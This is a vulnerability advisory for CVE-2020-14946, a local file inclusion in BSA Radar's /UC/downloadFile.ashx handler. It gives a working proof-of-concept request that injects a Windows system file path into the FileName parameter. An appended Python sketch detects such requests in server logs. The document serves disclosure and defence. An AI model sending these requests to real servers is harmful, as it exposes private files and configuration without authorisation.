"BSA Radar 1.6.7234.24750 - Local File Inclusion"

Author: "William Summerhill"

Platform: multiple

Release date: 2020-07-14

# Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion
# Date: 2020-07-08
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14946 - Local File Inclusion

# Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X 
# and lower allows users to download transaction files. When downloading the files, 
# a user is able to view local files on the web server by manipulating the FileName 
# and FilePath parameters in the URL, or while using a proxy. This vulnerability could 
# be used to view local sensitive files or configuration files on the backend server.

	Vulnerable endpoint: /UC/downloadFile.ashx

	The current user is required to have valid privileges to send requests to the target vulnerable endpoint.

Proof of Concept:

	HTTP Request PoC:

		VALID REQUEST:
		GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6

		LFI EXPLOIT REQUEST:
		GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6

	The entire local file path can be injected into the "FileName" parameter in order to enumerate existing files on the server. Other local files can be tested (such as the Windows hosts file) for further verification and disclosures.

Tested on: Windows

CVE: CVE-2020-14946

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946
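
A detection sketch for the request pattern described above, added here as an example and not part of the original advisory: it scans web-server log lines for requests to /UC/downloadFile.ashx whose FileName or FilePath value is an absolute path, and goes slightly beyond the advisory's case by also flagging ".." segments and repeated percent-encoding. The simplified "ip method url status" log layout, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

ENDPOINT = "/uc/downloadfile.ashx"   # vulnerable handler named in the advisory
PARAMS = {"filename", "filepath"}    # parameters the advisory says can be manipulated

# Absolute Windows path (C:\ or C:/), UNC or rooted path, or a ".." segment.
SUSPICIOUS = re.compile(r"^[a-z]:[\\/]|^[\\/]|(^|[\\/])\.\.([\\/]|$)", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252F -> %2F -> /)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return [(param, decoded_value)] for path-like FileName/FilePath values."""
    parts = urlsplit(url)
    if parts.path.lower() != ENDPOINT:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in PARAMS:
            value = fully_decode(value)
            if SUSPICIOUS.search(value):
                hits.append((name, value))
    return hits

def scan(log_lines):
    """Yield (client_ip, param, value) from lines shaped 'ip method url status'."""
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        for name, value in suspicious_params(fields[2]):
            yield fields[0], name, value

# Constructed sample log lines (assumed layout, not from a real server).
SAMPLE_LOG = [
    "10.0.0.5 GET /UC/downloadFile.ashx?ID=1&FileName=report.txt&UploadStyle=1&UploadSource=6 200",
    "10.0.0.9 GET /UC/downloadFile.ashx?ID=1&FileName=C:\\Windows\\debug\\NetSetup.log&UploadStyle=1&UploadSource=6 200",
    "10.0.0.9 GET /UC/downloadFile.ashx?ID=1&FileName=..%252F..%252Fexample.cfg&UploadStyle=1&UploadSource=6 200",
    "10.0.0.7 GET /UC/other.ashx?FileName=C:%5Cx.txt 200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

For real IIS W3C logs, join the cs-uri-stem and cs-uri-query fields into the URL passed to `suspicious_params`.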